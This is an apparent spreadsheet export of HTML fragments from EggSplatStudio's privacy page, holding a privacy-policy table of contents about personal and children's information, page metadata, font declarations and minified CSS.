                                        Child&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_4"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;4&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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You can manage personal information about
                                        You and/or Your
                                        Child&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_5"&gt;&lt;u&gt;&lt;span</t>
  </si>
  <si>
    <t>class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;5&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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We keep personal information about You
                                        and/or Your Child
                                        secure&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_6"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;6&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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We retain personal information about You
                                        and/or Your
                                        Child&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_7"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;7&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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We protect children's personal
                                        information&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_8"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;8&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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style="font-size:12pt"&gt;&lt;u&gt;International transfer of personal
                                        information about You
                                        and/or Your Child&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_9"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;9&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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We update
                                        this&amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;i&gt;&lt;u&gt;&lt;span class="colour"
                                style="color:rgb(5, 99, 193)"&gt;&lt;i&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                                            class="size"
                                            style="font-size:12pt"&gt;&lt;u&gt;Policy&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/a&gt;&lt;/span&gt;&lt;span
                class="font" style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_10"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;10&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span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style="font-size:12pt"&gt;&lt;u&gt;How to contact
                                        Us&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_11"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;11&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span class="colour"
                            style="color:rgb(0, 0, 255)"&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size"
                                    style="font-size:12pt"&gt;&lt;u&gt;&amp;nbsp;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;u&gt;&lt;span class="colour"
                            style="color:rgb(5, 99, 193)"&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                                    class="size" style="font-size:12pt"&gt;&lt;u&gt;Definition of Key
                                        Words&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_12"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;u&gt;II SPECIAL
                                        TERMS——JURISDICTION SCHEDULE&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span
                class="font" style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_13"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;u&gt;Speical Terms for
                                        U.S.A Users&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="font"
                style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;"&gt;
            &lt;span&gt;&lt;a href="#id_14"&gt;&lt;u&gt;&lt;span class="colour" style="color:rgb(5, 99, 193)"&gt;&lt;span class="font"
                                style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;u&gt;Special
                                        Terms&amp;nbsp;for EU Users&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;span
                class="font" style="font-family:宋体"&gt;&lt;span class="size" style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
        &lt;p class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;text-indent:24.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;"&gt;
            &lt;span class="highlight" style="background-color:rgb(255, 255, 255)"&gt;&lt;span class="font"
                    style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt;line-height:26px"&gt;Please note that, for easy
                        access,
                        You may click on the relevant link above to be directed to a particular section, but We
                        recommend
                        You could read this&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;span class="highlight"
                    style="background-color:rgb(255, 255, 255)"&gt;&lt;i&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span
                                class="size" style="font-size:12pt"&gt;&amp;nbsp;Policy&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/i&gt;&lt;span
                class="highlight" style="background-color:rgb(255, 255, 255)"&gt;&lt;span class="font"
                    style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;in full to ensure You are fully
                        informed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="font" style="font-family:宋体"&gt;&lt;span class="size"
                    style="font-size:12pt"&gt;&lt;/span&gt;&lt;/span&gt;
        &lt;/p&gt;
        &lt;p id="id_0" class="MsoNormal"
            style="margin-bottom:10.0000pt;mso-add-space:auto;mso-pagination:widow-orphan;text-align:left;mso-outline-level:1;text-indent: 0;"&gt;
            &lt;b&gt;&lt;b&gt;&lt;span class="font" style="font-family:Arial"&gt;&lt;span class="size" style="font-size:12pt"&gt;I GENERAL
                            TERMS&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;span class="font" style="font-family:宋体"&gt;&lt;span class="size"
                        style="font-size:24pt"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
        &lt;/p&gt;
        &lt;p id="id_1" class="MsoNormal"
            style="</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;&lt;html lang="en-US"&gt;&lt;head&gt;&lt;link rel="icon" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:16,h:16,m" sizes="16x16"/&gt;&lt;link rel="icon" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:24,h:24,m" sizes="24x24"/&gt;&lt;link rel="icon" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:32,h:32,m" sizes="32x32"/&gt;&lt;link rel="icon" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:48,h:48,m" sizes="48x48"/&gt;&lt;link rel="icon" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:64,h:64,m" sizes="64x64"/&gt;&lt;meta charSet="utf-8"/&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"/&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1"/&gt;&lt;title&gt;Privacy | EggSplatStudio&lt;/title&gt;&lt;meta name="author" content="EggSplatStudio"/&gt;&lt;meta name="generator" content="Starfield Technologies; Go Daddy Website Builder 8.0.0000"/&gt;&lt;link rel="manifest" href="/manifest.webmanifest"/&gt;&lt;link rel="apple-touch-icon" sizes="57x57" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:57,h:57,m"/&gt;&lt;link rel="apple-touch-icon" sizes="60x60" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:60,h:60,m"/&gt;&lt;link rel="apple-touch-icon" sizes="72x72" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:72,h:72,m"/&gt;&lt;link rel="apple-touch-icon" sizes="114x114" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:114,h:114,m"/&gt;&lt;link rel="apple-touch-icon" sizes="120x120" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:120,h:120,m"/&gt;&lt;link rel="apple-touch-icon" sizes="144x144" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:144,h:144,m"/&gt;&lt;link rel="apple-touch-icon" sizes="152x152" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:152,h:152,m"/&gt;&lt;link rel="apple-touch-icon" sizes="180x180" href="//img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/favicon/ba843d9b-51c5-49de-8ad0-c6049e197b06.png/:/rs=w:180,h:180,m"/&gt;&lt;meta property="og:url" content="https://eggsplatstudios.com/privacy"/&gt;
&lt;meta property="og:site_name" content="EggSplatStudio"/&gt;
&lt;meta property="og:title" content="Games That Splat"/&gt;
&lt;meta property="og:description" content="Creating quality games, by gamers, for gamers!"/&gt;
&lt;meta property="og:type" content="website"/&gt;
&lt;meta property="og:image" content="https://img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/Untitled-1.png"/&gt;
&lt;meta property="og:locale" content="en_US"/&gt;
&lt;meta name="twitter:card" content="summary"/&gt;
&lt;meta name="twitter:title" content="EggSplatStudio"/&gt;
&lt;meta name="twitter:description" content="Games That Splat"/&gt;
 &lt;meta name="twitter:image" content="https://img1.wsimg.com/isteam/ip/5fe83927-82f5-4e57-aac6-460bcff5b1cf/Untitled-1.png"/&gt;
&lt;meta name="twitter:image:alt" content="EggSplatStudio"/&gt;
&lt;meta name="theme-color" content="#3C3C3C"/&gt;&lt;style data-inline-fonts&gt;@font-face {
  font-family: 'Muli';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: url(https://img1.wsimg.com/gfonts/s/muli/v28/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk30e4.woff) format('woff');
}
@font-face {
  font-family: 'Quicksand';
  font-style: normal;
  font-weight: 400;
  font-display: swap;
  src: url(https://img1.wsimg.com/gfonts/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o58a-xA.woff) format('woff');
}
@font-face {
  font-family: 'Quicksand';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: url(https://img1.wsimg.com/gfonts/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv58a-xA.woff) format('woff');
}
&lt;/style&gt;&lt;style&gt;/*
Copyright 2016 The Muli Project Authors (contact@sansoxygen.com)
 This Font Software is licensed under the SIL Open Font License, Version 1.1.
</t>
  </si>
  <si>
    <t>This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL
—————————————————————————————-
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
—————————————————————————————-
*/
/*
Copyright 2011 The Quicksand Project Authors (https://github.com/andrew-paglinawan/QuicksandFamily), with Reserved Font Name Quicksand.
 This Font Software is licensed under the SIL Open Font License, Version 1.1.
 This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL
—————————————————————————————-
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
—————————————————————————————-
*/
&lt;/style&gt;
&lt;style&gt;.x{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:rgba(0,0,0,0);margin:0;box-sizing:border-box}.x *,.x :</t>
  </si>
  <si>
    <t>after,.x :before{box-sizing:inherit}.x-el a[href^="mailto:"]:not(.x-el),.x-el a[href^="tel:"]:not(.x-el){color:inherit;font-size:inherit;text-decoration:inherit}.x-el-article,.x-el-aside,.x-el-details,.x-el-figcaption,.x-el-figure,.x-el-footer,.x-el-header,.x-el-hgroup,.x-el-main,.x-el-menu,.x-el-nav,.x-el-section,.x-el-summary{display:block}.x-el-audio,.x-el-canvas,.x-el-progress,.x-el-video{display:inline-block;vertical-align:baseline}.x-el-audio:not([controls]){display:none;height:0}.x-el-template{display:none}.x-el-a{background-color:transparent;color:inherit}.x-el-a:active,.x-el-a:hover{outline:0}.x-el-abbr[title]{border-bottom:1px dotted}.x-el-b,.x-el-strong{font-weight:700}.x-el-dfn{font-style:italic}.x-el-mark{background:#ff0;color:#000}.x-el-small{font-size:80%}.x-el-sub,.x-el-sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.x-el-sup{top:-.5em}.x-el-sub{bottom:-.25em}.x-el-img{vertical-align:middle;border:0}.x-el-svg:not(:root){overflow:hidden}.x-el-figure{margin:0}.x-el-hr{box-sizing:content-box;height:0}.x-el-pre{overflow:auto}.x-el-code,.x-el-kbd,.x-el-pre,.x-el-samp{font-family:monospace,monospace;font-size:1em}.x-el-button,.x-el-input,.x-el-optgroup,.x-el-select,.x-el-textarea{color:inherit;font:inherit;margin:0}.x-el-button{overflow:visible}.x-el-button,.x-el-select{text-transform:none}.x-el-button,.x-el-input[type=button],.x-el-input[type =reset],.x-el-input[type=submit]{-webkit-appearance:button;cursor:pointer}.x-el-button[disabled],.x-el-input[disabled]{cursor:default}.x-el-button::-moz-focus-inner,.x-el-input::-moz-focus-inner{border:0;padding:0}.x-el-input{line-height:normal}.x-el-input[type=checkbox],.x-el-input[type=radio]{box-sizing:border-box;padding:0}.x-el-input[type=number]::-webkit-inner-spin-button,.x-el-input[type=number]::-webkit-outer-spin-button{height:auto}.x-el-input[type=search]{-webkit-appearance:textfield;box-sizing:content-box}.x-el-input[type=search]::-webkit-search-cancel-button,.x-el-input[type=search]::-webkit-search-decoration{-webkit-appearance:none}.x-el-textarea{border:0}.x-el-fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}.x-el-legend{border:0;padding:0}.x-el-textarea{overflow:auto}.x-el-optgroup{font-weight:700}.x-el-table{border-collapse:collapse;border-spacing:0}.x-el-td,.x-el-th{padding:0}.x{-webkit-font-smoothing:antialiased}.x-el-hr{border:0}.x-el-fieldset,.x-el-input,.x-el-select,.x-el-textarea{margin-top:0;margin-bottom:0}.x-el-fieldset,.x-el-input[type=email],.x-el-input[type=text],.x-el-textarea{width:100%}.x-el-label{vertical-align:middle}.x-el-input{border-style:none;padding:.5em;vertical-align:middle}.x-el-select:not([multiple]){vertical-align:middle}.x-el-textarea{line-height:1.75;padding:.5em}.x-el.d-none{display:none!important}.sideline-footer{margin-top:auto}@-webkit-keyframes loaderscale{0%{transform:scale(1);opacity:1}45%{transform:scale(.1);opacity:.7}80%{transform:scale(1);opacity:1}}@keyframes loaderscale{0%{transform:scale(1);opacity:1}45%{transform:scale(.1);opacity:.7}80%{transform:scale(1);opacity:1}}.x-loader svg{display:inline-block}.x-loader svg:first-child{-webkit-animation:loaderscale .75s</t>
  </si>
  <si>
    <t>cubic-bezier(.2,.68,.18,1.08) -.24s infinite;animation:loaderscale .75s cubic-bezier(.2,.68,.18,1.08) -.24s infinite}.x-loader svg:nth-child(2){-webkit-animation:loaderscale .75s</t>
  </si>
  <si>
    <t>cubic-bezier(.2,.68,.18,1.08) -.12s infinite;animation:loaderscale .75s cubic-bezier(.2,.68,.18,1.08) -.12s infinite}.x-loader svg:nth-child(3){-webkit-animation:loaderscale .75s</t>
  </si>
  <si>
    <t>cubic-bezier(.2,.68,.18,1.08) 0s infinite;animation:loaderscale .75s cubic-bezier(.2,.68,.18,1.08) 0s infinite}.x-icon&gt;svg{transition:transform .33s ease-in-out}.x-icon&gt;svg.rotate-90{transform:rotate(-90deg)}.x-icon&gt;svg.rotate90{transform:rotate(90deg)}.x-icon&gt;svg.rotate-180{transform:rotate(-180deg)}.x-icon&gt;svg.rotate180{transform:rotate(180deg)}.x-rt:after{content:"";clear:both}.x-rt ol,.x-rt ul{text-align:left}.x-rt p{margin:0}.x-rt br{clear:both}.mte-inline-block{display:inline-block}@media only screen and (min-device-width:1025px){:root select,_::-webkit-full-page-media,_:future{font-family:sans-serif!important}}
&lt;/style&gt;
&lt;style data-glamor="cxs-default-sheet"&gt;.x .c1-1{letter-spacing:normal}.x .c1-2{text-transform:none}.x .c1-3{background-color:rgb(255, 255, 255)}.x .c1-4{width:100%}.x .c1-5 &gt; div{position:relative}.x .c1-6 &gt; div{overflow:hidden}.x .c1-7 &gt; div{margin-top:auto}.x .c1-8 &gt; div{margin-right:auto}.x .c1-9 &gt; div{margin-bottom:auto}.x .c1-a &gt; div{margin-left:auto}.x .c1-b{font-family:Quicksand, sans-serif}.x .c1-c{font-size:16px}.x .c1-h{background-color:rgb(60, 60, 60)}.x .c1-i{padding-top:56px}.x .c1-j{padding-bottom:56px}.x .c1-k{padding:0px !</t>
  </si>
  <si>
    <t>important}.x .c1-n{display:none}.x .c1-p{margin-left:auto}.x .c1-q{margin-right:auto}.x .c1-r{padding-left:24px}.x .c1-s{padding-right:24px}.x .c1-t{max-width:100%}.x .c1-u{position:relative}.x .c1-v{background-color:rgb(51, 51, 51)}.x .c1-w{z-index:2}.x .c1-x{padding-top:16px}.x .c1-y{padding-bottom:16px}.x .c1-z{margin-bottom:0px}.x .c1-15{display:flex}.x .c1-16{justify-content:space-between}.x .c1-17{align-items:center}.x .c1-18{padding-left:16px}.x .c1-19{padding-right:16px}.x .c1-1a{text-align:left}.x .c1-1b{padding-right:32px}.x .c1-1c{flex-shrink:0}.x .c1-1d{flex-basis:30%}.x .c1-1e{flex-grow:0}.x .c1-1f{justify-content:left}.x .c1-1g{display:inline-block}.x .c1-1h{font-family:'Muli', sans-serif}.x .c1-1m{letter-spacing:inherit}.x .c1-1n{text-transform:inherit}.x .c1-1o{text-decoration:none}.x .c1-1p{word-wrap:break-word}.x .c1-1q{overflow-wrap:break-word}.x .c1-1r{display:inline}.x .c1-1s{cursor:pointer}.x .c1-1t{border-top:0px}.x .c1-1u{border-right:0px}.x .c1-1v{border-bottom:0px}.x .c1-1w{border-left:0px}.x .c1-1x{color:rgb(127, 128, 128)}.x .c1-1y{font-weight:inherit}.x .c1-1z:hover{color:rgb(191, 191, 191)}.x .c1-20:active{color:rgb(219, 219, 219)}.x .c1-21{letter-spacing:0.091em}.x .c1-22{text-transform:uppercase}.x .c1-23{line-height:1.2}.x .c1-24{margin-left:0}.x .c1-25{margin-right:0}.x .c1-26{margin-top:0}.x .c1-27{color:rgb(169, 169, 169)}.x .c1-28{font-size:22px}.x .c1-29{font-weight:400}.x .c1-2e{word-wrap:normal ! important}.x .c1-2f{overflow-wrap:normal ! important}.x .c1-2g{visibility:hidden}.x .c1-2h{position:absolute}.x .c1-2i{width:auto}.x .c1-2j{overflow:visible}.x .c1-2k{left:0}.x .c1-2l{font-size:32px}.x .c1-2q{font-size:28px}.x .c1-2v{height:inherit}.x .c1-2w{justify-content:flex-end}.x .c1-2x{flex-basis:auto}.x .c1-2y{flex-grow:1}.x .c1-2z{line-height:24px}.x .c1-30{-webkit-margin-before:0}.x .c1-31{-webkit-margin-after:0}.x .c1-32{-webkit-padding-start:0}.x .c1-33{padding-top:0}.x .c1-34{padding-right:0}.x .c1-35{padding-bottom:0}.x .c1-36{padding-left:0}.x .c1-37{color:rgb(164, 164, 164)}.x .c1-38{margin-bottom:none}.x .c1-39{list-style:none}.x .c1-3a{vertical-align:top}.x .c1-3b{padding-left:32px}.x .c1-3c{white-space:nowrap}.x .c1-3d:first-child{margin-left:0}.x .c1-3e:first-child{padding-left:0}.x .c1-3f{letter-spacing:0.167em}.x .c1-3g{margin-left:-6px}.x .c1-3h{margin-right:-6px}.x .c1-3i{margin-top:-6px}.x .c1-3j{margin-bottom:-6px}.x .c1-3k{padding-left:6px}.x .c1-3l{padding-right:6px}.x .c1-3m{padding-top:6px}.x .c1-3n{padding-bottom:6px}.x .c1-3o{font-size:12px}.x .c1-3p:before{content:""}.x .c1-3q:before{margin-right:0.5em}.x .c1-3r:before{display:inline-block}.x .c1-3s:before{height:1px}.x .c1-3t:before{width:0.5em}.x .c1-3u:before{background-color:rgb(247, 247, 247)}.x .c1-3v:before{transition:inherit}.x .c1-3w:before{vertical-align:middle}.x .c1-3x:before{opacity:0}.x .c1-3y:active{color:rgb(127, 128, 128)}.x .c1-43:before{background-color:rgb(137, 137, 137)}.x .c1-44:before{opacity:1}.x .c1-45:before{transform:translateY(-100%)}.x .c1-46{color:inherit}.x .c1-47{transition:transform .33s ease-in-out}.x .c1-48{transform:rotate(0deg)}.x .c1-49{vertical-align:middle}.x .c1-4a{height:10px}.x .c1-4b{top:1px}.x .c1-4c{margin-left:4px}.x .c1-4d{border-radius:0px}.x .c1-4e{box-shadow:0</t>
  </si>
  <si>
    <t>3px 6px 3px rgba(0,0,0,0.24)}.x .c1-4f{right:0px}.x .c1-4g{top:32px}.x .c1-4h{max-height:45vh}.x .c1-4i{overflow-y:auto}.x .c1-4j{z-index:3}.x .c1-4m{display:block}.x .c1-4n:last-child{margin-bottom:0}.x .c1-4o{margin-top:8px}.x .c1-4p{margin-bottom:8px}.x .c1-4q{line-height:1.5}.x .c1-4s{box-sizing:border-box}.x .c1-4t{flex-direction:row}.x .c1-4u{flex-wrap:nowrap}.x .c1-4v{margin-right:-0px}.x .c1-4w{margin-bottom:-0px}.x .c1-4x{margin-left:-0px}.x .c1-4y{justify-content:flex-start}.x .c1-53{flex-basis:10%}.x .c1-54{max-width:none}.x .c1-55{padding-right:0px}.x .c1-56{padding-bottom:0px}.x .c1-57{padding-left:0px}.x .c1-5c{color:rgb(247, 247, 247)}.x .c1-5d:hover{color:rgb(127, 128, 128)}.x .c1-5e{flex-shrink:1}.x .c1-5f{flex-basis:80%}.x .c1-5g{max-width:80%}.x .c1-5h{text-align:center}.x .c1-5i{word-break:break-word}.x .c1-5j{max-width:10%}.x .c1-5k{position:fixed}.x .c1-5l{top:0px}.x .c1-5m{width:88%}.x .c1-5n{height:100%}.x .c1-5o{max-width:0px}.x .c1-5p{z-index:10002}.x .c1-5q{-webkit-overflow-scrolling:touch}.x .c1-5r{transition:max-width .3s ease-in-out}.x .c1-5s{right:unset}.x .c1-5t{overflow:hidden}.x .c1-5u{flex-direction:column}.x .c1-5v{color:#aaa}.x .c1-5w{line-height:1.3em}.x .c1-5x{font-style:normal}.x .c1-5y{top:15px}.x .c1-5z{right:15px}.x .c1-60:hover{color:#EEE}.x .c1-61{overflow-x:hidden}.x .c1-66{margin-bottom:32px}.x .c1-67 &gt; 